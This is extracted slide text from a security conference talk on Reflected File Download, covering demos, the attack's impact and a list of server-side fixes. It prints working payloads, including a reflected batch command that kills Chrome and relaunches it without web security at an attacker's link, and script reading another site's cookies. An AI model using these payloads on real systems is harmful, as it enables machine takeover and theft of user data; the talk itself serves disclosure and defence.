Eu 14 Hafif Reflected File Download A New Web Attack Vector
Eu 14 Hafif Reflected File Download A New Web Attack Vector
Eu 14 Hafif Reflected File Download A New Web Attack Vector
Oren Hafif
Security Researcher
Trustwave Spiderlabs
Download executable files
from
Google.com & Bing.com
File executes, No warnings
and
Gains control over the Machine
Reflected File Download
http://thechive.com/2009/02/14/these-
people-exist-part-3-25-photos/
Two Major Conferences
E v e r y s u m m e r i n Ve g a s
http://thechive.com/2009/02/14/these-
people-exist-part-3-25-photos/
There is nothing more joyful for a security professional…
Oren Hafif
Security Researcher
Trustwave Spiderlabs
Agenda
• Objectives
• Understand RFD
– What?
– Why?
– How?
• Advanced Exploitation
Agenda - What is RFD?
• DEMO!
• Analysis of the demo
Agenda – Why RFD?
• Motivation
• RFD exploitation capabilities and implications
• Trust Model for web downloads
Agenda – How RFD?
• How to Detect?
• How to Exploit?
• How to Prevent?
> Age.round(28)=30
Age.round(27)=25
About Myself…
About Myself…
OBJECTIVES
BREAKERS
DETECT
AND
REPORT
RFD ISSUES
DEFENDERS
PREVENT
AND BLOCK
RFD
ATTACKS
BUILDERS
DEVELOP
SECURE
APIS and
WEB APPS
Windows Calculator
DEMO
Demo: Let’s talk about it…
• User clicked on a valid link to Google.com
• A malicious file got downloaded from Google.com
• The file executes immediately, once clicked.
• Windows calculator popped up (Pwned)!
No upload takes place…
A file is being downloaded…
Uploadless Downloads!
RFD Implications (Why?)
• Gain full control over the user’s machine
• Confidentiality – steal everything, install trojans
• Availability – delete everything, use cryptolockers
• Integrity – impersonate the user/website.
TRUST?
WHICH ONE WOULD YOU TRUST?
WHAT MAKES YOU TRUST A DOWNLOAD?
Referrer
19%
Host
81%
4 OUT OF 5
WOULD TRUST DOWNLOADS
BASED ON THE HOSTING DOMAIN
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd\"||calc||","I love
rfd"]}
https://google.com/s;/setup.bat;?q=rfd"||calc||
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd\"||calc||","I love
rfd"]}
https://google.com/s;/setup.bat;?q=rfd"||calc||
Google Chrome
OVER NINE HUNDREEEEDD!
Let’s use just 2 out of 973…
• --disable-web-security
shuts down same-origin-policy!
• --disable-popup-blocker
well…
• Result: one big mess! YOU OWN CHROME!
1 http://www.google.com/s;/ChromeSetup.bat;?q=payload&...
User
4
5 http://attacker-website.com/
6
User <script> Attacker
win = open(“http://mail.google.com”);
alert(win.document.body); // granted
Web Server
alert(win.document.cookie); //granted
Let’s create an exploit!
1 2 3 4 5 6 7
["\"||taskkill /F /IM ch*|md||start chrome pi.vu/B2jj --disable-web-security
--disable-popup-blocking||",[],{"t":{"bpc":false,"tlw":false},"q":"Xwxg4gmQoA9Zn6E2DjScDWXR
zbQ"}] 8
1 Result: '["\"' is not recognized as an internal or external command, operable program or batch file.
2 || is the OR operator, since the left hand side failed, the right hand side will be executed.
3 Killing all tasks with names starting with “ch” – targeting “chrome.exe”. Chrome will be closed.
4 | redirects the input to the next command
5 The md command creates new directories. Its only use here is to cause the expression to be false.
6 || same trick as before, continuing the execution since the last expression was false.
7 Starting Chrome at the attacker’s URL without Web security and popup blocking.
8 || this time Chrome was started successfully, so the rest of the commands are ignored.
DEMO
Stealing emails from GMAIL
DEMO
Cross-Social Network RFD Worm
DEMO
Cross-Social Network RFD Worm
DEMO
Cross-Social Network RFD Worm
DEMO
Cross-Social Network RFD Worm
How to Fix RFD?
• Use exact URL mapping – no wildcards!
• Do not escape! Encode! \” \u0022 or \x22
• Add Content-Disposition w/ filename att.:
Content-Disposition: attachment; filename=1.txt
• Require Custom Headers for all APIs
• If possible use CSRF tokens
How to Fix RFD - more?
• Whitelist Callbacks – reflected by default!
• Enforce XSSI mitigation like for(;;);
• Never include user input in API usage errors.
• Remove support for Path Parameters
(semicolons)
• X-Content-Type-Options: nosniff
Summary
• Your site can be used to attack users!
• Attackers get full control of victims machine.
• A file is downloaded without being uploaded.
• Advanced exploitation (chrome/powershell)
and bypasses (windows).
• Fix it! I am so scared!
Who is responsible?
“We recognize that the address bar is the only
reliable security indicator in modern browsers.”